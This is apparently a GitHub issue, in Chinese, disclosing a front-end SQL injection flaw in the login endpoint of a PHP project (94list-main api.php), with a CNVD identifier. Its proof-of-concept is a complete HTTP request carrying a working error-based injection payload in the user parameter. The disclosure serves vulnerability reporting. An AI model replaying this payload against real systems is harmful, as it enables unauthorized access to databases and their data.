Skip to content

存在前台sql注入漏洞 #65

Open
Open
存在前台sql注入漏洞#65
@TL-SN

Description

@TL-SN
TL-SN
opened on Apr 10, 2026

漏洞点

Image

漏洞复现

Image

PoC脚本

OST /94list-main/api.php HTTP/1.1
Host: 127.0.0.1:81
sec-ch-ua-platform: "Windows"
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
sec-ch-ua: "Chromium";v="146", "Not-A.Brand";v="24", "Google Chrome";v="146"
sec-ch-ua-mobile: ?0
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Content-Length: 33

type=login&user=admin' AND (SELECT 5954 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (CONCAT(user(),1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'fvWF'='fvWF&pass=789456
Image Image

cnvd编号

CNVD-2026-15605

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions